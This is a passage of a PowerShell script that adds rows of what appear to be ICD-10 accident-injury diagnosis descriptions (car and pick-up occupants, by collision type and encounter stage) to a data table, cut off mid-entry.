= $DiagnosisList.Rows.Add("Person on outside of car injured in collision with heavy transport vehicle or bus in nontraffic accident","Person on outside of car injured in collision with heavy transport vehicle or bus in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with heavy transport vehicle or bus in nontraffic accident","Unspecified car occupant injured in collision with heavy transport vehicle or bus in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with heavy transport vehicle or bus in nontraffic accident","Unspecified car occupant injured in collision with heavy transport vehicle or bus in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with heavy transport vehicle or bus in nontraffic accident","Unspecified car occupant injured in collision with heavy transport vehicle or bus in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in collision with heavy transport vehicle or bus","Person boarding or alighting a car injured in collision with heavy transport vehicle or bus, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in collision with heavy transport vehicle or bus","Person boarding or alighting a car injured in collision with heavy transport vehicle or bus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in collision with heavy transport vehicle or bus","Person boarding or alighting a car injured in collision with heavy transport vehicle or bus, sequela") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with heavy transport vehicle or bus in traffic accident","Car driver injured in collision with heavy transport vehicle or bus in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with heavy transport vehicle or bus in traffic accident","Car driver injured in collision with heavy transport vehicle or bus in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with heavy transport vehicle or bus in traffic accident","Car driver injured in collision with heavy transport vehicle or bus in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with heavy transport vehicle or bus in traffic accident","Car passenger injured in collision with heavy transport vehicle or bus in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with heavy transport vehicle or bus in traffic accident","Car passenger injured in collision with heavy transport vehicle or bus in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with heavy transport vehicle or bus in traffic accident","Car passenger injured in collision with heavy transport vehicle or bus in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with heavy transport vehicle or bus in traffic accident","Person on outside of car injured in collision with heavy transport vehicle or bus in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with heavy transport vehicle or bus in traffic accident","Person on outside of car injured in collision with heavy transport vehicle or bus in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with heavy transport vehicle or bus in traffic accident","Person on outside of car injured in collision with heavy transport vehicle or bus in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with heavy transport vehicle or bus in traffic accident","Unspecified car occupant injured in collision with heavy transport vehicle or bus in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with heavy transport vehicle or bus in traffic accident","Unspecified car occupant injured in collision with heavy transport vehicle or bus in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with heavy transport vehicle or bus in traffic accident","Unspecified car occupant injured in collision with heavy transport vehicle or bus in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with railway train or railway vehicle in nontraffic accident","Car driver injured in collision with railway train or railway vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with railway train or railway vehicle in nontraffic accident","Car driver injured in collision with railway train or railway vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with railway train or railway vehicle in nontraffic accident","Car driver injured in collision with railway train or railway vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with railway train or railway vehicle in nontraffic accident","Car passenger injured in collision with railway train or railway vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with railway train or railway vehicle in nontraffic accident","Car passenger injured in collision with railway train or railway vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with railway train or railway vehicle in nontraffic accident","Car passenger injured in collision with railway train or railway vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with railway train or railway vehicle in nontraffic accident","Person on outside of car injured in collision with railway train or railway vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with railway train or railway vehicle in nontraffic accident","Person on outside of car injured in collision with railway train or railway vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with railway train or railway vehicle in nontraffic accident","Person on outside of car injured in collision with railway train or railway vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with railway train or railway vehicle in nontraffic accident","Unspecified car occupant injured in collision with railway train or railway vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with railway train or railway vehicle in nontraffic accident","Unspecified car occupant injured in collision with railway train or railway vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with railway train or railway vehicle in nontraffic accident","Unspecified car occupant injured in collision with railway train or railway vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in collision with railway train or railway vehicle","Person boarding or alighting a car injured in collision with railway train or railway vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in collision with railway train or railway vehicle","Person boarding or alighting a car injured in collision with railway train or railway vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in collision with railway train or railway vehicle","Person boarding or alighting a car injured in collision with railway train or railway vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with railway train or railway vehicle in traffic accident","Car driver injured in collision with railway train or railway vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with railway train or railway vehicle in traffic accident","Car driver injured in collision with railway train or railway vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with railway train or railway vehicle in traffic accident","Car driver injured in collision with railway train or railway vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with railway train or railway vehicle in traffic accident","Car passenger injured in collision with railway train or railway vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with railway train or railway vehicle in traffic accident","Car passenger injured in collision with railway train or railway vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with railway train or railway vehicle in traffic accident","Car passenger injured in collision with railway train or railway vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with railway train or railway vehicle in traffic accident","Person on outside of car injured in collision with railway train or railway vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with railway train or railway vehicle in traffic accident","Person on outside of car injured in collision with railway train or railway vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with railway train or railway vehicle in traffic accident","Person on outside of car injured in collision with railway train or railway vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with railway train or railway vehicle in traffic accident","Unspecified car occupant injured in collision with railway train or railway vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with railway train or railway vehicle in traffic accident","Unspecified car occupant injured in collision with railway train or railway vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with railway train or railway vehicle in traffic accident","Unspecified car occupant injured in collision with railway train or railway vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with other nonmotor vehicle in nontraffic accident","Car driver injured in collision with other nonmotor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with other nonmotor vehicle in nontraffic accident","Car driver injured in collision with other nonmotor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with other nonmotor vehicle in nontraffic accident","Car driver injured in collision with other nonmotor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with other nonmotor vehicle in nontraffic accident","Car passenger injured in collision with other nonmotor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with other nonmotor vehicle in nontraffic accident","Car passenger injured in collision with other nonmotor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with other nonmotor vehicle in nontraffic accident","Car passenger injured in collision with other nonmotor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with other nonmotor vehicle in nontraffic accident","Person on outside of car injured in collision with other nonmotor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with other nonmotor vehicle in nontraffic accident","Person on outside of car injured in collision with other nonmotor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with other nonmotor vehicle in nontraffic accident","Person on outside of car injured in collision with other nonmotor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with other nonmotor vehicle in nontraffic accident","Unspecified car occupant injured in collision with other nonmotor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with other nonmotor vehicle in nontraffic accident","Unspecified car occupant injured in collision with other nonmotor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with other nonmotor vehicle in nontraffic accident","Unspecified car occupant injured in collision with other nonmotor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in collision with other nonmotor vehicle","Person boarding or alighting a car injured in collision with other nonmotor vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in collision with other nonmotor vehicle","Person boarding or alighting a car injured in collision with other nonmotor vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in collision with other nonmotor vehicle","Person boarding or alighting a car injured in collision with other nonmotor vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with other nonmotor vehicle in traffic accident","Car driver injured in collision with other nonmotor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with other nonmotor vehicle in traffic accident","Car driver injured in collision with other nonmotor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with other nonmotor vehicle in traffic accident","Car driver injured in collision with other nonmotor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with other nonmotor vehicle in traffic accident","Car passenger injured in collision with other nonmotor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with other nonmotor vehicle in traffic accident","Car passenger injured in collision with other nonmotor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with other nonmotor vehicle in traffic accident","Car passenger injured in collision with other nonmotor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with other nonmotor vehicle in traffic accident","Person on outside of car injured in collision with other nonmotor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with other nonmotor vehicle in traffic accident","Person on outside of car injured in collision with other nonmotor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with other nonmotor vehicle in traffic accident","Person on outside of car injured in collision with other nonmotor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with other nonmotor vehicle in traffic accident","Unspecified car occupant injured in collision with other nonmotor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with other nonmotor vehicle in traffic accident","Unspecified car occupant injured in collision with other nonmotor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with other nonmotor vehicle in traffic accident","Unspecified car occupant injured in collision with other nonmotor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with fixed or stationary object in nontraffic accident","Car driver injured in collision with fixed or stationary object in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with fixed or stationary object in nontraffic accident","Car driver injured in collision with fixed or stationary object in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with fixed or stationary object in nontraffic accident","Car driver injured in collision with fixed or stationary object in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with fixed or stationary object in nontraffic accident","Car passenger injured in collision with fixed or stationary object in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with fixed or stationary object in nontraffic accident","Car passenger injured in collision with fixed or stationary object in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with fixed or stationary object in nontraffic accident","Car passenger injured in collision with fixed or stationary object in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with fixed or stationary object in nontraffic accident","Person on outside of car injured in collision with fixed or stationary object in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with fixed or stationary object in nontraffic accident","Person on outside of car injured in collision with fixed or stationary object in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with fixed or stationary object in nontraffic accident","Person on outside of car injured in collision with fixed or stationary object in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with fixed or stationary object in nontraffic accident","Unspecified car occupant injured in collision with fixed or stationary object in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with fixed or stationary object in nontraffic accident","Unspecified car occupant injured in collision with fixed or stationary object in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with fixed or stationary object in nontraffic accident","Unspecified car occupant injured in collision with fixed or stationary object in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in collision with fixed or stationary object","Person boarding or alighting a car injured in collision with fixed or stationary object, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in collision with fixed or stationary object","Person boarding or alighting a car injured in collision with fixed or stationary object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in collision with fixed or stationary object","Person boarding or alighting a car injured in collision with fixed or stationary object, sequela") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with fixed or stationary object in traffic accident","Car driver injured in collision with fixed or stationary object in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with fixed or stationary object in traffic accident","Car driver injured in collision with fixed or stationary object in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with fixed or stationary object in traffic accident","Car driver injured in collision with fixed or stationary object in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with fixed or stationary object in traffic accident","Car passenger injured in collision with fixed or stationary object in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with fixed or stationary object in traffic accident","Car passenger injured in collision with fixed or stationary object in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with fixed or stationary object in traffic accident","Car passenger injured in collision with fixed or stationary object in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with fixed or stationary object in traffic accident","Person on outside of car injured in collision with fixed or stationary object in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with fixed or stationary object in traffic accident","Person on outside of car injured in collision with fixed or stationary object in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with fixed or stationary object in traffic accident","Person on outside of car injured in collision with fixed or stationary object in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with fixed or stationary object in traffic accident","Unspecified car occupant injured in collision with fixed or stationary object in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with fixed or stationary object in traffic accident","Unspecified car occupant injured in collision with fixed or stationary object in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with fixed or stationary object in traffic accident","Unspecified car occupant injured in collision with fixed or stationary object in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car driver injured in noncollision transport accident in nontraffic accident","Car driver injured in noncollision transport accident in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in noncollision transport accident in nontraffic accident","Car driver injured in noncollision transport accident in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in noncollision transport accident in nontraffic accident","Car driver injured in noncollision transport accident in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car passenger injured in noncollision transport accident in nontraffic accident","Car passenger injured in noncollision transport accident in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in noncollision transport accident in nontraffic accident","Car passenger injured in noncollision transport accident in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in noncollision transport accident in nontraffic accident","Car passenger injured in noncollision transport accident in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in noncollision transport accident in nontraffic accident","Person on outside of car injured in noncollision transport accident in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in noncollision transport accident in nontraffic accident","Person on outside of car injured in noncollision transport accident in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in noncollision transport accident in nontraffic accident","Person on outside of car injured in noncollision transport accident in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in noncollision transport accident in nontraffic accident","Unspecified car occupant injured in noncollision transport accident in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in noncollision transport accident in nontraffic accident","Unspecified car occupant injured in noncollision transport accident in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in noncollision transport accident in nontraffic accident","Unspecified car occupant injured in noncollision transport accident in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in noncollision transport accident","Person boarding or alighting a car injured in noncollision transport accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in noncollision transport accident","Person boarding or alighting a car injured in noncollision transport accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in noncollision transport accident","Person boarding or alighting a car injured in noncollision transport accident, sequela") + $null = $DiagnosisList.Rows.Add("Car driver injured in noncollision transport accident in traffic accident","Car driver injured in noncollision transport accident in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in noncollision transport accident in traffic accident","Car driver injured in noncollision transport accident in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in noncollision transport accident in traffic accident","Car driver injured in noncollision transport accident in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car passenger injured in noncollision transport accident in traffic accident","Car passenger injured in noncollision transport accident in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in noncollision transport accident in traffic accident","Car passenger injured in noncollision transport accident in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in noncollision transport accident in traffic accident","Car passenger injured in noncollision transport accident in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in noncollision transport accident in traffic accident","Person on outside of car injured in noncollision transport accident in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in noncollision transport accident in traffic accident","Person on outside of car injured in noncollision transport accident in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in noncollision transport accident in traffic accident","Person on outside of car injured in noncollision transport accident in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in noncollision transport accident in traffic accident","Unspecified car occupant injured in noncollision transport accident in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in noncollision transport accident in traffic accident","Unspecified car occupant injured in noncollision transport accident in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in noncollision transport accident in traffic accident","Unspecified car occupant injured in noncollision transport accident in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver injured in collision with unspecified motor vehicles in nontraffic accident","Driver injured in collision with unspecified motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver injured in collision with unspecified motor vehicles in nontraffic accident","Driver injured in collision with unspecified motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver injured in collision with unspecified motor vehicles in nontraffic accident","Driver injured in collision with unspecified motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver injured in collision with other motor vehicles in nontraffic accident","Driver injured in collision with other motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver injured in collision with other motor vehicles in nontraffic accident","Driver injured in collision with other motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver injured in collision with other motor vehicles in nontraffic accident","Driver injured in collision with other motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger injured in collision with unspecified motor vehicles in nontraffic accident","Passenger injured in collision with unspecified motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger injured in collision with unspecified motor vehicles in nontraffic accident","Passenger injured in collision with unspecified motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger injured in collision with unspecified motor vehicles in nontraffic accident","Passenger injured in collision with unspecified motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger injured in collision with other motor vehicles in nontraffic accident","Passenger injured in collision with other motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger injured in collision with other motor vehicles in nontraffic accident","Passenger injured in collision with other motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger injured in collision with other motor vehicles in nontraffic accident","Passenger injured in collision with other motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with unspecified motor vehicles in nontraffic accident","Unspecified car occupant injured in collision with unspecified motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with unspecified motor vehicles in nontraffic accident","Unspecified car occupant injured in collision with unspecified motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with unspecified motor vehicles in nontraffic accident","Unspecified car occupant injured in collision with unspecified motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with other motor vehicles in nontraffic accident","Unspecified car occupant injured in collision with other motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with other motor vehicles in nontraffic accident","Unspecified car occupant injured in collision with other motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with other motor vehicles in nontraffic accident","Unspecified car occupant injured in collision with other motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car occupant (driver) (passenger) injured in unspecified nontraffic accident","Car occupant (driver) (passenger) injured in unspecified nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car occupant (driver) (passenger) injured in unspecified nontraffic accident","Car occupant (driver) (passenger) injured in unspecified nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car occupant (driver) (passenger) injured in unspecified nontraffic accident","Car occupant (driver) (passenger) injured in unspecified nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver injured in collision with unspecified motor vehicles in traffic accident","Driver injured in collision with unspecified motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver injured in collision with unspecified motor vehicles in traffic accident","Driver injured in collision with unspecified motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver injured in collision with unspecified motor vehicles in traffic accident","Driver injured in collision with unspecified motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver injured in collision with other motor vehicles in traffic accident","Driver injured in collision with other motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver injured in collision with other motor vehicles in traffic accident","Driver injured in collision with other motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver injured in collision with other motor vehicles in traffic accident","Driver injured in collision with other motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger injured in collision with unspecified motor vehicles in traffic accident","Passenger injured in collision with unspecified motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger injured in collision with unspecified motor vehicles in traffic accident","Passenger injured in collision with unspecified motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger injured in collision with unspecified motor vehicles in traffic accident","Passenger injured in collision with unspecified motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger injured in collision with other motor vehicles in traffic accident","Passenger injured in collision with other motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger injured in collision with other motor vehicles in traffic accident","Passenger injured in collision with other motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger injured in collision with other motor vehicles in traffic accident","Passenger injured in collision with other motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with unspecified motor vehicles in traffic accident","Unspecified car occupant injured in collision with unspecified motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with unspecified motor vehicles in traffic accident","Unspecified car occupant injured in collision with unspecified motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with unspecified motor vehicles in traffic accident","Unspecified car occupant injured in collision with unspecified motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with other motor vehicles in traffic accident","Unspecified car occupant injured in collision with other motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with other motor vehicles in traffic accident","Unspecified car occupant injured in collision with other motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with other motor vehicles in traffic accident","Unspecified car occupant injured in collision with other motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car occupant (driver) (passenger) injured in transport accident with military vehicle","Car occupant (driver) (passenger) injured in transport accident with military vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Car occupant (driver) (passenger) injured in transport accident with military vehicle","Car occupant (driver) (passenger) injured in transport accident with military vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car occupant (driver) (passenger) injured in transport accident with military vehicle","Car occupant (driver) (passenger) injured in transport accident with military vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Car occupant (driver) (passenger) injured in other specified transport accidents","Car occupant (driver) (passenger) injured in other specified transport accidents, initial encounter") + $null = $DiagnosisList.Rows.Add("Car occupant (driver) (passenger) injured in other specified transport accidents","Car occupant (driver) (passenger) injured in other specified transport accidents, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car occupant (driver) (passenger) injured in other specified transport accidents","Car occupant (driver) (passenger) injured in other specified transport accidents, sequela") + $null = $DiagnosisList.Rows.Add("Car occupant (driver) (passenger) injured in unspecified traffic accident","Car occupant (driver) (passenger) injured in unspecified traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car occupant (driver) (passenger) injured in unspecified traffic accident","Car occupant (driver) (passenger) injured in unspecified traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car occupant (driver) (passenger) injured in unspecified traffic accident","Car occupant (driver) (passenger) injured in unspecified traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with pedestrian or animal in nontraffic accident","Driver of pick-up truck or van injured in collision with pedestrian or animal in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with pedestrian or animal in nontraffic accident","Driver of pick-up truck or van injured in collision with pedestrian or animal in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with pedestrian or animal in nontraffic accident","Driver of pick-up truck or van injured in collision with pedestrian or animal in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with pedestrian or animal in nontraffic accident","Passenger in pick-up truck or van injured in collision with pedestrian or animal in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with pedestrian or animal in nontraffic accident","Passenger in pick-up truck or van injured in collision with pedestrian or animal in 